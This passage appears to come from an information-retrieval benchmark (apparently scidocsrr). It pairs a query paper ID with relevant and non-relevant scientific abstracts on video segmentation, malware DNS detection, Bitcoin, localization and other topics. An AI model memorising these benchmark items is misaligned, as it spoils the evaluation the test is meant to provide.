"text": "Our goal is to segment a video sequence into moving objects and the world scene. In recent work, spectral embedding of point trajectories based on 2D motion cues accumulated from their lifespans, has shown to outperform factorization and per frame segmentation methods for video segmentation. The scale and kinematic nature of the moving objects and the background scene determine how close or far apart trajectories are placed in the spectral embedding. Such density variations may confuse clustering algorithms, causing over-fragmentation of object interiors. Therefore, instead of clustering in the spectral embedding, we propose detecting discontinuities of embedding density between spatially neighboring trajectories. Detected discontinuities are strong indicators of object boundaries and thus valuable for video segmentation. We propose a novel embedding discretization process that recovers from over-fragmentations by merging clusters according to discontinuity evidence along inter-cluster boundaries. For segmenting articulated objects, we combine motion grouping cues with a center-surround saliency operation, resulting in “context-aware”, spatially coherent, saliency maps. Figure-ground segmentation obtained from saliency thresholding, provides object connectedness constraints that alter motion based trajectory affinities, by keeping articulated parts together and separating disconnected in time objects. Finally, we introduce Gabriel graphs as effective per frame superpixel maps for converting trajectory clustering to dense image segmentation. Gabriel edges bridge large contour gaps via geometric reasoning without over-segmenting coherent image regions. We present experimental results of our method that outperform the state-of-the-art in challenging motion segmentation datasets.",
"title": ""
},
{
"docid": "2e016f935e8795fe1e470ff945b63646",
"text": "We address the problem of segmenting multiple object instances in complex videos. Our method does not require manual pixel-level annotation for training, and relies instead on readily-available object detectors or visual object tracking only. Given object bounding boxes at input, we cast video segmentation as a weakly-supervised learning problem. Our proposed objective combines (a) a discriminative clustering term for background segmentation, (b) a spectral clustering one for grouping pixels of same object instances, and (c) linear constraints enabling instance-level segmentation. We propose a convex relaxation of this problem and solve it efficiently using the Frank-Wolfe algorithm. We report results and compare our method to several baselines on a new video dataset for multi-instance person segmentation.",
"title": ""
},
{
"docid": "a00065c171175b84cf299718d0b29dde",
"text": "Semantic object segmentation in video is an important step for large-scale multimedia analysis. In many cases, however, semantic objects are only tagged at video-level, making them difficult to be located and segmented. To address this problem, this paper proposes an approach to segment semantic objects in weakly labeled video via object detection. In our approach, a novel video segmentation-by-detection framework is proposed, which first incorporates object and region detectors pre-trained on still images to generate a set of detection and segmentation proposals. Based on the noisy proposals, several object tracks are then initialized by solving a joint binary optimization problem with min-cost flow. As such tracks actually provide rough configurations of semantic objects, we thus refine the object segmentation while preserving the spatiotemporal consistency by inferring the shape likelihoods of pixels from the statistical information of tracks. Experimental results on Youtube-Objects dataset and SegTrack v2 dataset demonstrate that our method outperforms state-of-the-arts and shows impressive results.",
"title": ""
},
{
"docid": "a4b123705dda7ae3ac7e9e88a50bd64a",
"text": "We present a novel approach to video segmentation using multiple object proposals. The problem is formulated as a minimization of a novel energy function defined over a fully connected graph of object proposals. Our model combines appearance with long-range point tracks, which is key to ensure robustness with respect to fast motion and occlusions over longer video sequences. As opposed to previous approaches based on object proposals, we do not seek the best per-frame object hypotheses to perform the segmentation. Instead, we combine multiple, potentially imperfect proposals to improve overall segmentation accuracy and ensure robustness to outliers. Overall, the basic algorithm consists of three steps. First, we generate a very large number of object proposals for each video frame using existing techniques. Next, we perform an SVM-based pruning step to retain only high quality proposals with sufficiently discriminative power. Finally, we determine the fore-and background classification by solving for the maximum a posteriori of a fully connected conditional random field, defined using our novel energy function. Experimental results on a well established dataset demonstrate that our method compares favorably to several recent state-of-the-art approaches.",
"title": ""
}
] | [
{
"docid": "663068bb3ff4d57e1609b2a337a34d7f",
"text": "Automated optic disk (OD) detection plays an important role in developing a computer aided system for eye diseases. In this paper, we propose an algorithm for the OD detection based on structured learning. A classifier model is trained based on structured learning. Then, we use the model to achieve the edge map of OD. Thresholding is performed on the edge map, thus a binary image of the OD is obtained. Finally, circle Hough transform is carried out to approximate the boundary of OD by a circle. The proposed algorithm has been evaluated on three public datasets and obtained promising results. The results (an area overlap and Dices coefficients of 0.8605 and 0.9181, respectively, an accuracy of 0.9777, and a true positive and false positive fraction of 0.9183 and 0.0102) show that the proposed method is very competitive with the state-of-the-art methods and is a reliable tool for the segmentation of OD.",
"title": ""
},
{
"docid": "f8209a4b6cb84b63b1f034ec274fe280",
"text": "A major challenge in topic classification (TC) is the high dimensionality of the feature space. Therefore, feature extraction (FE) plays a vital role in topic classification in particular and text mining in general. FE based on cosine similarity score is commonly used to reduce the dimensionality of datasets with tens or hundreds of thousands of features, which can be impossible to process further. In this study, TF-IDF term weighting is used to extract features. Selecting relevant features and determining how to encode them for a learning machine method have a vast impact on the learning machine methods ability to extract a good model. Two different weighting methods (TF-IDF and TF-IDF Global) were used and tested on the Reuters-21578 text categorization test collection. The obtained results emerged a good candidate for enhancing the performance of English topics FE. Simulation results the Reuters-21578 text categorization show the superiority of the proposed algorithm.",
"title": ""
},
{
"docid": "4ad76f2c22a6429b7111349a86746aa0",
"text": "A photovoltaic array (PVA) simulation model to be used in Matlab-Simulink GUI environment is developed and presented in this paper. The model is developed using basic circuit equations of the photovoltaic (PV) solar cells including the effects of solar irradiation and temperature changes. The new model was tested using a directly coupled dc load as well as ac load via an inverter. Test and validation studies with proper load matching circuits are simulated and results are presented here.",
"title": ""
},
{
"docid": "b5d7c6a4d9551bf9b47b4e3754fb5911",
"text": "Discovering significant types of relations from the web is challenging because of its open nature. Unsupervised algorithms are developed to extract relations from a corpus without knowing the relations in advance, but most of them rely on tagging arguments of predefined types. Recently, a new algorithm was proposed to jointly extract relations and their argument semantic classes, taking a set of relation instances extracted by an open IE algorithm as input. However, it cannot handle polysemy of relation phrases and fails to group many similar (“synonymous”) relation instances because of the sparseness of features. In this paper, we present a novel unsupervised algorithm that provides a more general treatment of the polysemy and synonymy problems. The algorithm incorporates various knowledge sources which we will show to be very effective for unsupervised extraction. Moreover, it explicitly disambiguates polysemous relation phrases and groups synonymous ones. While maintaining approximately the same precision, the algorithm achieves significant improvement on recall compared to the previous method. It is also very efficient. Experiments on a realworld dataset show that it can handle 14.7 million relation instances and extract a very large set of relations from the web.",
"title": ""
},
{
"docid": "6721ff54fde3ac49c2e0e26ae683d5a1",
"text": "APT (Advanced Persistent Threat) is a genuine risk to the Internet. With the help of APT malware, attackers can remotely control infected machine and steal the personal information. DNS is well known for malware to find command and control (C&C) servers. The proposed novel system placed at the network departure guide that points toward effectively and efficiently detect APT malware infections based on malicious DNS and traffic analysis. To detect suspicious APT malware C&C domains the system utilizes malicious DNS analysis method, and afterward analyse the traffic of the comparing suspicious IP utilizing anomaly-based and signature based detection innovation. There are separated features in view of big data to describe properties of malware-related DNS. This manufactured a reputation engine to compute a score for an IP address by utilizing these elements vector together.",
"title": ""
},
{
"docid": "fd4bd9edcaff84867b6e667401aa3124",
"text": "We give suggestions for the presentation of research results from frequentist, information-theoretic, and Bayesian analysis paradigms, followed by several general suggestions. The information-theoretic and Bayesian methods offer alternative approaches to data analysis and inference compared to traditionally used methods. Guidance is lacking on the presentation of results under these alternative procedures and on nontesting aspects of classical frequentist methods of statistical analysis. Null hypothesis testing has come under intense criticism. We recommend less reporting of the results of statistical tests of null hypotheses in cases where the null is surely false anyway, or where the null hypothesis is of little interest to science or management. JOURNAL OF WILDLIFE MANAGEMENT 65(3):373-378",
"title": ""
},
{
"docid": "6c9acb831bc8dc82198aef10761506be",
"text": "In the context of civil rights law, discrimination refers to unfair or unequal treatment of people based on membership to a category or a minority, without regard to individual merit. Rules extracted from databases by data mining techniques, such as classification or association rules, when used for decision tasks such as benefit or credit approval, can be discriminatory in the above sense. In this paper, the notion of discriminatory classification rules is introduced and studied. Providing a guarantee of non-discrimination is shown to be a non trivial task. A naive approach, like taking away all discriminatory attributes, is shown to be not enough when other background knowledge is available. Our approach leads to a precise formulation of the redlining problem along with a formal result relating discriminatory rules with apparently safe ones by means of background knowledge. An empirical assessment of the results on the German credit dataset is also provided.",
"title": ""
},
{
"docid": "fa91331ef31de20ae63cc6c8ab33f062",
"text": "Humans move their hands and bodies together to communicate and solve tasks. Capturing and replicating such coordinated activity is critical for virtual characters that behave realistically. Surprisingly, most methods treat the 3D modeling and tracking of bodies and hands separately. Here we formulate a model of hands and bodies interacting together and fit it to full-body 4D sequences. When scanning or capturing the full body in 3D, hands are small and often partially occluded, making their shape and pose hard to recover. To cope with low-resolution, occlusion, and noise, we develop a new model called MANO (hand Model with Articulated and Non-rigid defOrmations). MANO is learned from around 1000 high-resolution 3D scans of hands of 31 subjects in a wide variety of hand poses. The model is realistic, low-dimensional, captures non-rigid shape changes with pose, is compatible with standard graphics packages, and can fit any human hand. MANO provides a compact mapping from hand poses to pose blend shape corrections and a linear manifold of pose synergies. We attach MANO to a standard parameterized 3D body shape model (SMPL), resulting in a fully articulated body and hand model (SMPL+H). We illustrate SMPL+H by fitting complex, natural, activities of subjects captured with a 4D scanner. The fitting is fully automatic and results in full body models that move naturally with detailed hand motions and a realism not seen before in full body performance capture. The models and data are freely available for research purposes at http://mano.is.tue.mpg.de.",
"title": ""
},
{
"docid": "d31646394ff4e6aa66bbb3c61651592e",
"text": "The computer vision strategies used to recognize a fruit rely on four basic features which characterize the object: intensity, color, shape and texture. This paper proposes an efficient fusion of color and texture features for fruit recognition. The recognition is done by the minimum distance classifier based upon the statistical and co-occurrence features derived from the Wavelet transformed subbands. Experimental results on a database of about 2635 fruits from 15 different classes confirm the effectiveness of the proposed approach.",
"title": ""
},
{
"docid": "427d0d445985ac4eb31c7adbaf6f1e22",
"text": "In this work, we jointly address the problem of text detection and recognition in natural scene images based on convolutional recurrent neural networks. We propose a unified network that simultaneously localizes and recognizes text with a single forward pass, avoiding intermediate processes, such as image cropping, feature re-calculation, word separation, and character grouping. In contrast to existing approaches that consider text detection and recognition as two distinct tasks and tackle them one by one, the proposed framework settles these two tasks concurrently. The whole framework can be trained end-to-end, requiring only images, ground-truth bounding boxes and text labels. The convolutional features are calculated only once and shared by both detection and recognition, which saves processing time. Through multi-task training, the learned features become more informative and improves the overall performance. Our proposed method has achieved competitive performance on several benchmark datasets.",
"title": ""
},
{
"docid": "afb0ca2ca4c9ba6402bff498f23f4c55",
"text": "We consider the problem of assigning software processes (or tasks) to hardware processors in distributed robotics environments. We introduce the notion of a task variant, which supports the adaptation of software to specific hardware configurations. Task variants facilitate the trade-off of functional quality versus the requisite capacity and type of target execution processors. We formalise the problem of assigning task variants to processors as a mathematical model that incorporates typical constraints found in robotics applications; the model is a constrained form of a multi-objective, multi-dimensional, multiple-choice knapsack problem. We propose and evaluate three different solution methods to the problem: constraint programming, a constructive greedy heuristic and a local search metaheuristic. Furthermore, we demonstrate the use of task variants in a real instance of a distributed interactive multi-agent navigation system, showing that our best solution method (constraint programming) improves the system’s quality of service, as compared to the local search metaheuristic, the greedy heuristic and a randomised solution, by an average of 16%, 41% and 56% respectively.",
"title": ""
},
{
"docid": "91a3969506858fd7484d870505c6b800",
"text": "Automatic grasp planning for robotic hands is a difficult problem because of the huge number of possible hand configurations. However, humans simplify the problem by choosing an appropriate prehensile posture appropriate for the object and task to be performed. By modeling an object as a set of shape primitives, such as spheres, cylinders, cones and boxes, we can use a set of rules to generate a set of grasp starting positions and pregrasp shapes that can then be tested on the object model. Each grasp is tested and evaluated within our grasping simulator “GraspIt!”, and the best grasps are presented to the user. The simulator can also plan grasps in a complex environment involving obstacles and the reachability constraints of a robot arm.",
"title": ""
},
{
"docid": "c4d204b8ceda86e9d8e4ca56214f0ba3",
"text": "This article may be used for research, teaching and private study purposes. Any substantial or systematic reproduction, redistribution , reselling , loan or sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. The publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. The accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. The publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused arising directly or indirectly in connection with or arising out of the use of this material.",
"title": ""
},
{
"docid": "11112e1738bd27f41a5b57f07b71292c",
"text": "Rotor-cage fault detection in inverter-fed induction machines is still difficult nowadays as the dynamics introduced by the control or load influence the fault-indicator signals commonly applied. In addition, detection is usually possible only when the machine is operated above a specific load level to generate a significant rotor-current magnitude. This paper proposes a new method of detecting rotor-bar defects at zero load and almost at standstill. The method uses the standard current sensors already present in modern industrial inverters and, hence, is noninvasive. It is thus well suited as a start-up test for drives. By applying an excitation with voltage pulses using the switching of the inverter and then measuring the resulting current slope, a new fault indicator is obtained. As a result, it is possible to clearly identify the fault-induced asymmetry in the machine's transient reactances. Although the transient-flux linkage cannot penetrate the rotor because of the cage, the faulty bar locally influences the zigzag flux, leading to a significant change in the transient reactances. Measurement results show the applicability and sensitivity of the proposed method.",
"title": ""
},
{
"docid": "27ffdb0d427d2e281ffe84e219e6ed72",
"text": "UNLABELLED\nHitherto, noncarious cervical lesions (NCCLs) of teeth have been generally ascribed to either toothbrush-dentifrice abrasion or acid \"erosion.\" The last two decades have provided a plethora of new studies concerning such lesions. The most significant studies are reviewed and integrated into a practical approach to the understanding and designation of these lesions. A paradigm shift is suggested regarding use of the term \"biocorrosion\" to supplant \"erosion\" as it continues to be misused in the United States and many other countries of the world. Biocorrosion embraces the chemical, biochemical, and electrochemical degradation of tooth substance caused by endogenous and exogenous acids, proteolytic agents, as well as the piezoelectric effects only on dentin. Abfraction, representing the microstructural loss of tooth substance in areas of stress concentration, should not be used to designate all NCCLs because these lesions are commonly multifactorial in origin. Appropriate designation of a particular NCCL depends upon the interplay of the specific combination of three major mechanisms: stress, friction, and biocorrosion, unique to that individual case. Modifying factors, such as saliva, tongue action, and tooth form, composition, microstructure, mobility, and positional prominence are elucidated.\n\n\nCLINICAL SIGNIFICANCE\nBy performing a comprehensive medical and dental history, using precise terms and concepts, and utilizing the Revised Schema of Pathodynamic Mechanisms, the dentist may successfully identify and treat the etiology of root surface lesions. Preventive measures may be instituted if the causative factors are detected and their modifying factors are considered.",
"title": ""
},
{
"docid": "5635f52c3e02fd9e9ea54c9ea1ff0329",
"text": "As a digital version of word-of-mouth, online review has become a major information source for consumers and has very important implications for a wide range of management activities. While some researchers focus their studies on the impact of online product review on sales, an important assumption remains unexamined, that is, can online product review reveal the true quality of the product? To test the validity of this key assumption, this paper first empirically tests the underlying distribution of online reviews with data from Amazon. The results show that 53% of the products have a bimodal and non-normal distribution. For these products, the average score does not necessarily reveal the product's true quality and may provide misleading recommendations. Then this paper derives an analytical model to explain when the mean can serve as a valid representation of a product's true quality, and discusses its implication on marketing practices.",
"title": ""
},
{
"docid": "2f4043e4be2c02a33790bbff094749d0",
"text": "Well-positioned and configured vegetation barriers (VBs) have been suggested as one of the green infrastructures that could improve near-road (local) air quality. This is because of their influence on the underlying mechanisms: dispersion and mass removal (by deposition). Some studies have investigated air quality improvement by near-road vegetation barrier using the dispersion-related method while few studies have done the same using the deposition-related method. However, decision making on vegetation barrier's configuration and placement for need-based maximum benefit requires a combined assessment with both methods which are not commonly found in a single study. In the present study, we employed a computational fluid dynamics model, ENVI-met, to evaluate the air quality benefit of near-road vegetation barrier using an integrated dispersion-deposition approach. A technique based on distance between source (road) and point of peak concentration before dwindling concentration downwind begins referred to as \"distance to maximum concentration (DMC)\" has been proposed to determine optimum position from source and thickness of vegetation barrier for improved dispersion and deposition-based benefit, respectively. Generally, a higher volume of vegetation barrier increases the overall mass removal while it weakens dispersion of pollutant within the same domain. Hence, the benefit of roadside vegetation barrier is need-based and can be expressed as either higher mass deposition or higher mass dispersion. Finally, recommendations on applications of our findings were presented.",
"title": ""
},
{
"docid": "82c3003dc62528f5efc13f0e6f5ea9f6",
"text": "Deep Learning (DL) algorithms have become ubiquitous in data analytics. As a result, major computing vendors — including NVIDIA, Intel, AMD and IBM — have architectural road-maps influenced by DL workloads. Furthermore, several vendors have recently advertised new computing products as accelerating DL workloads. Unfortunately, it is difficult for data scientists to quantify the potential of these different products. This paper provides a performance and power analysis of important DL workloads on two major parallel architectures: NVIDIA DGX-1 (eight Pascal P100 GPUs interconnected with NVLink) and Intel Knights Landing (KNL) CPUs interconnected with Intel Omni-Path. Our evaluation consists of a cross section of convolutional neural net workloads: CifarNet, CaffeNet, AlexNet and GoogleNet topologies using the Cifar10 and ImageNet datasets. The workloads are vendor optimized for each architecture. GPUs provide the highest overall raw performance. Our analysis indicates that although GPUs provide the highest overall performance, the gap can close for some convolutional networks; and KNL can be competitive when considering performance/watt. Furthermore, NVLink is critical to GPU scaling.",
"title": ""
},
{
"docid": "75a1dba24f2b98904423b5db7c3b9df7",
"text": "INTRODUCTION\nShort-wavelengths can have an acute impact on alertness, which is allegedly due to their action on intrinsically photosensitive retinal ganglion cells. Classical photoreceptors cannot, however, be excluded at this point in time as contributors to the alerting effect of light. The objective of this study was to compare the alerting effect at night of a white LED light source while wearing blue-blockers or not, in order to establish the contribution of short-wavelengths.\n\n\nMATERIALS AND METHODS\n20 participants stayed awake under dim light (< 5 lx) from 23:00 h to 04:00 h on two consecutive nights. On the second night, participants were randomly assigned to one light condition for 30 min starting at 3:00 h. Group A (5M/5F) was exposed to 500 μW/cm(2) of unfiltered LED light, while group B (4M/6F) was required to wear blue-blocking glasses, while exposed to 1500 μW/cm(2) from the same light device in order to achieve 500 μW/cm(2) at eye level (as measured behind the glasses). Subjective alertness, energy, mood and anxiety were assessed for both nights at 23:30 h, 01:30 h and 03:30 h using a visual analog scale (VAS). Subjective sleepiness was assessed with the Stanford Sleepiness Scale (SSS). Subjects also performed the Conners' Continuous Performance Test II (CPT-II) in order to assess objective alertness. Mixed model analysis was used to compare VAS, SSS and CPT-II parameters.\n\n\nRESULTS\nNo difference between group A and group B was observed for subjective alertness, energy, mood, anxiety and sleepiness, as well as CPT-II parameters. Subjective alertness (p < 0.001), energy (p < 0.001) and sleepiness (p < 0.05) were, however improved after light exposure on the second night independently of the light condition.\n\n\nCONCLUSIONS\nThe current study shows that when sleepiness is high, the alerting effect of light can still be triggered at night in the absence of short-wavelengths with a 30 minute light pulse of 500 μW/cm(2). This suggests that the underlying mechanism by which a brief polychromatic light exposure improves alertness is not solely due to short-wavelengths through intrinsically photosensitive retinal ganglion cells.",
"title": ""
}
] | scidocsrr |
e8902b4f01103e4860c272c284704ce5 | T-Finder: A Recommender System for Finding Passengers and Vacant Taxis | [
{
"docid": "ebea79abc60a5d55d0397d21f54cc85e",
"text": "The increasing availability of large-scale location traces creates unprecedent opportunities to change the paradigm for knowledge discovery in transportation systems. A particularly promising area is to extract useful business intelligence, which can be used as guidance for reducing inefficiencies in energy consumption of transportation sectors, improving customer experiences, and increasing business performances. However, extracting business intelligence from location traces is not a trivial task. Conventional data analytic tools are usually not customized for handling large, complex, dynamic, and distributed nature of location traces. To that end, we develop a taxi business intelligence system to explore the massive taxi location traces from different business perspectives with various data mining functions. Since we implement the system using the real-world taxi GPS data, this demonstration will help taxi companies to improve their business performances by understanding the behaviors of both drivers and customers. In addition, several identified technical challenges also motivate data mining people to develop more sophisticate techniques in the future.",
"title": ""
},
{
"docid": "871d6acae5a9d95f81b0ff6513332cb2",
"text": "A novel probabilistic retrieval model is presented. It forms a basis to interpret the TF-IDF term weights as making relevance decisions. It simulates the local relevance decision-making for every location of a document, and combines all of these “local” relevance decisions as the “document-wide” relevance decision for the document. The significance of interpreting TF-IDF in this way is the potential to: (1) establish a unifying perspective about information retrieval as relevance decision-making; and (2) develop advanced TF-IDF-related term weights for future elaborate retrieval models. Our novel retrieval model is simplified to a basic ranking formula that directly corresponds to the TF-IDF term weights. In general, we show that the term-frequency factor of the ranking formula can be rendered into different term-frequency factors of existing retrieval systems. In the basic ranking formula, the remaining quantity - log p(&rmacr;|t ∈ d) is interpreted as the probability of randomly picking a nonrelevant usage (denoted by &rmacr;) of term t. Mathematically, we show that this quantity can be approximated by the inverse document-frequency (IDF). Empirically, we show that this quantity is related to IDF, using four reference TREC ad hoc retrieval data collections.",
"title": ""
}
] | [
{
"docid": "14aea0d3fce695ee7f6bf39e1fa97ecd",
"text": "Interpreters designed for high general-purpose performance typically perform a large number of indirect branches (3.2%–13% of all executed instructions in our benchmarks). These branches consume more than half of the run-time in a number of configurations we simulated. We evaluate how accurate various existing and proposed branch prediction schemes are on a number of interpreters, how the mispredictions affect the performance of the interpreters and how two different interpreter implementation techniques perform with various branch predictors. We also suggest various ways in which hardware designers, C compiler writers, and interpreter writers can improve the performance of interpreters.",
"title": ""
},
{
"docid": "b6e6784d18c596565ca1e4d881398a0d",
"text": "Uncovering lies (or deception) is of critical importance to many including law enforcement and security personnel. Though these people may try to use many different tactics to discover deception, previous research tells us that this cannot be accomplished successfully without aid. This manuscript reports on the promising results of a research study where data and text mining methods along with a sample of real-world data from a high-stakes situation is used to detect deception. At the end, the information fusion based classification models produced better than 74% classification accuracy on the holdout sample using a 10-fold cross validation methodology. Nonetheless, artificial neural networks and decision trees produced accuracy rates of 73.46% and 71.60% respectively. However, due to the high stakes associated with these types of decisions, the extra effort of combining the models to achieve higher accuracy",
"title": ""
},
{
"docid": "877d7d467711e8cb0fd03a941c7dc9da",
"text": "Film clips are widely utilized to elicit emotion in a variety of research studies. Normative ratings for scenes selected for these purposes support the idea that selected clips correspond to the intended target emotion, but studies reporting normative ratings are limited. Using an ethnically diverse sample of college undergraduates, selected clips were rated for intensity, discreteness, valence, and arousal. Variables hypothesized to affect the perception of stimuli (i.e., gender, race-ethnicity, and familiarity) were also examined. Our analyses generally indicated that males reacted strongly to positively valenced film clips, whereas females reacted more strongly to negatively valenced film clips. Caucasian participants tended to react more strongly to the film clips, and we found some variation by race-ethnicity across target emotions. Finally, familiarity with the films tended to produce higher ratings for positively valenced film clips, and lower ratings for negatively valenced film clips. These findings provide normative ratings for a useful set of film clips for the study of emotion, and they underscore factors to be considered in research that utilizes scenes from film for emotion elicitation.",
"title": ""
},
{
"docid": "79a500e8989fc5fb51097294ea504b0b",
"text": "An approach is presented that can be used to enhance the realism of yacht fleet race simulations. The wake of an upwind sailing yacht is represented as a single heeled horseshoe vortex (and image) system. At each time step changes in vortex strength are convected into the wake as a pair of vortex line elements. These subsequently move in accordance with the local wind, self-induced velocity and velocity induced by the presence of the wakes of other yachts. An empirical based decay factor is used to eventually remove the far wake. A synthesis of sail yacht wake representations based on detailed 3D Reynolds Averaged Navier-Stokes (RANS) Computational Fluid Dynamics (CFD) calculations with wind tunnel test results are used to capture the initial strength of the combined main-jib vortex system and its vertical height. These were based on a typical upwind sail arrangement for a range of heel angles and in-line calculations for a pair of yachts separated by three boat lengths. This paper details the basis of the validated CFD results for a yacht at heel and the analysis of the CFD results to provide an approximate single line vortex method for the yacht. The developed algorithm will eventually run within the Robo-Race which is a real-time yacht race strategy analysis tool based on MATLAB-Simulink developed at the University of Southampton. 1 Research Student, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 2 Reader, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 3 Head of Group, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 4 Research Engineer, Wolfson Unit for Marine Technology and Industrial Aerodynamics, University of Southampton, UK NOMENCLATURE ACC America's Cup Class AoA Angle of Attack CFD Computational Fluid Dynamics RANS Reynolds Averaged Navier-Stokes SST Shear Stress Transport CL, CD Lift and drag coefficients L Sail rig and yacht length r = {x, y, z} Position U Freestream velocity q = {u, v, w} Induced velocities in x-, y-, -z directions Γi Vortex strength of element i ω Vorticity",
"title": ""
},
{
"docid": "f96ec3cda630806531ea5f057d34a5fe",
"text": "W analyze firms’ decisions to invest in customer relationship management (CRM) initiatives such as acquisition and retention in a competitive context, a topic largely ignored in past CRM research. We characterize each customer by her intrinsic preference towards each firm, the contribution margin she generates for each firm, and her responsiveness to each firm’s retention and acquisition efforts. We show that a firm should invest most heavily in retaining those customers that exhibit moderate responsiveness to its CRM efforts. Further, a firm should most aggressively seek to attract those customers that exhibit moderate responsiveness to their provider’s CRM efforts and those that are moderately profitable for their current provider. Investing more in customers that are more responsive does not always lead to higher firm profits, because stronger competition for such customers tends to erode the effects of higher CRM efforts of an individual firm. When firms develop a customer relationship over time to generate higher contribution margin or customer responsiveness, we show that such developments may not always be desirable, because sometimes these future benefits may lead to more intense competition and hence lower profits for both firms.",
"title": ""
},
{
"docid": "391f9b889b1c3ffe3e8ee422d108edcd",
"text": "Does the brain of a bilingual process language differently from that of a monolingual? We compared how bilinguals and monolinguals recruit classic language brain areas in response to a language task and asked whether there is a neural signature of bilingualism. Highly proficient and early-exposed adult Spanish-English bilinguals and English monolinguals participated. During functional magnetic resonance imaging (fMRI), participants completed a syntactic sentence judgment task [Caplan, D., Alpert, N., & Waters, G. Effects of syntactic structure and propositional number on patterns of regional cerebral blood flow. Journal of Cognitive Neuroscience, 10, 541552, 1998]. The sentences exploited differences between Spanish and English linguistic properties, allowing us to explore similarities and differences in behavioral and neural responses between bilinguals and monolinguals, and between a bilingual's two languages. If bilinguals' neural processing differs across their two languages, then differential behavioral and neural patterns should be observed in Spanish and English. Results show that behaviorally, in English, bilinguals and monolinguals had the same speed and accuracy, yet, as predicted from the Spanish-English structural differences, bilinguals had a different pattern of performance in Spanish. fMRI analyses revealed that both monolinguals (in one language) and bilinguals (in each language) showed predicted increases in activation in classic language areas (e.g., left inferior frontal cortex, LIFC), with any neural differences between the bilingual's two languages being principled and predictable based on the morphosyntactic differences between Spanish and English. However, an important difference was that bilinguals had a significantly greater increase in the blood oxygenation level-dependent signal in the LIFC (BA 45) when processing English than the English monolinguals. The results provide insight into the decades-old question about the degree of separation of bilinguals' dual-language representation. The differential activation for bilinguals and monolinguals opens the question as to whether there may possibly be a neural signature of bilingualism. Differential activation may further provide a fascinating window into the language processing potential not recruited in monolingual brains and reveal the biological extent of the neural architecture underlying all human language.",
"title": ""
},
{
"docid": "0add9f22db24859da50e1a64d14017b9",
"text": "Light field imaging offers powerful new capabilities through sophisticated digital processing techniques that are tightly merged with unconventional optical designs. This combination of imaging technology and computation necessitates a fundamentally different view of the optical properties of imaging systems and poses new challenges for the traditional signal and image processing domains. In this article, we aim to provide a comprehensive review of the considerations involved and the difficulties encountered in working with light field data.",
"title": ""
},
{
"docid": "6ff74a5f335cf80d88d8365e9ef7b47b",
"text": "This paper presents an unsupervised deep-learning framework named local deep-feature alignment (LDFA) for dimension reduction. We construct neighbourhood for each data sample and learn a local stacked contractive auto-encoder (SCAE) from the neighbourhood to extract the local deep features. Next, we exploit an affine transformation to align the local deep features of each neighbourhood with the global features. Moreover, we derive an approach from LDFA to map explicitly a new data sample into the learned low-dimensional subspace. The advantage of the LDFA method is that it learns both local and global characteristics of the data sample set: the local SCAEs capture local characteristics contained in the data set, while the global alignment procedures encode the interdependencies between neighbourhoods into the final low-dimensional feature representations. Experimental results on data visualization, clustering, and classification show that the LDFA method is competitive with several well-known dimension reduction techniques, and exploiting locality in deep learning is a research topic worth further exploring.",
"title": ""
},
{
"docid": "ce5faeac9aa55ce5f0a481de290a27d4",
"text": "In the last decade, Web 2.0 services have been widely used as communication media. Due to the huge amount of available information, searching has become dominant in the use of Internet. Millions of users daily interact with search engines, producing valuable sources of interesting data regarding several aspects of the world. Search queries prove to be a useful source of information in financial applications, where the frequency of searches of terms related to the digital currency can be a good measure of interest in it. Bitcoin, a decentralized electronic currency, represents a radical change in financial systems, attracting a large number of users and a lot of media attention. In this work we studied the existing relationship between Bitcoin's trading volumes and the queries volumes of Google search engine. We achieved significant cross correlation values, demonstrating search volumes power to anticipate trading volumes of Bitcoin currency.",
"title": ""
},
{
"docid": "42b9c96304a708975b3032d8df12ba30",
"text": "This paper proposes a deep learning method to estimate the remaining useful life (RUL) of aero-propulsion engines. The proposed method is based on the long short-term memory (LSTM) structure of the recurrent neural network (RNN). LSTM can effectively extract the relationship between data items that are far separated in the time series. The proposed method is applied to the NASA C-MAPSS data set for RUL estimation accuracy evaluation and is compared with the methods using the multi-layer perceptron (MLP), support vector regression (SVR), relevance vector regression (RVR) and convolutional neural network (CNN). Comparisons show that the proposed method is better than others in terms of the root mean squared error (RMSE) and the value of a scoring function.",
"title": ""
},
{
"docid": "527c1e2a78e7f171025231a475a828b9",
"text": "Cryptography is the science to transform the information in secure way. Encryption is best alternative to convert the data to be transferred to cipher data which is an unintelligible image or data which cannot be understood by any third person. Images are form of the multimedia data. There are many image encryption schemes already have been proposed, each one of them has its own potency and limitation. This paper presents a new algorithm for the image encryption/decryption scheme which has been proposed using chaotic neural network. Chaotic system produces the same results if the given inputs are same, it is unpredictable in the sense that it cannot be predicted in what way the system's behavior will change for any little change in the input to the system. The objective is to investigate the use of ANNs in the field of chaotic Cryptography. The weights of neural network are achieved based on chaotic sequence. The chaotic sequence generated and forwarded to ANN and weighs of ANN are updated which influence the generation of the key in the encryption algorithm. The algorithm has been implemented in the software tool MATLAB and results have been studied. To compare the relative performance peak signal to noise ratio (PSNR) and mean square error (MSE) are used.",
"title": ""
},
{
"docid": "5056c2a6f132c25e4b0ff1a79c72f508",
"text": "The proliferation of Bluetooth Low-Energy (BLE) chipsets on mobile devices has lead to a wide variety of user-installable tags and beacons designed for location-aware applications. In this paper, we present the Acoustic Location Processing System (ALPS), a platform that augments BLE transmitters with ultrasound in a manner that improves ranging accuracy and can help users configure indoor localization systems with minimal effort. A user places three or more beacons in an environment and then walks through a calibration sequence with their mobile device where they touch key points in the environment like the floor and the corners of the room. This process automatically computes the room geometry as well as the precise beacon locations without needing auxiliary measurements. Once configured, the system can track a user's location referenced to a map.\n The platform consists of time-synchronized ultrasonic transmitters that utilize the bandwidth just above the human hearing limit, where mobile devices are still sensitive and can detect ranging signals. To aid in the mapping process, the beacons perform inter-beacon ranging during setup. Each beacon includes a BLE radio that can identify and trigger the ultrasonic signals. By using differences in propagation characteristics between ultrasound and radio, the system can classify if beacons are within Line-Of-Sight (LOS) to the mobile phone. In cases where beacons are blocked, we show how the phone's inertial measurement sensors can be used to supplement localization data. We experimentally evaluate that our system can estimate three-dimensional beacon location with a Euclidean distance error of 16.1cm, and can generate maps with room measurements with a two-dimensional Euclidean distance error of 19.8cm. When tested in six different environments, we saw that the system can identify 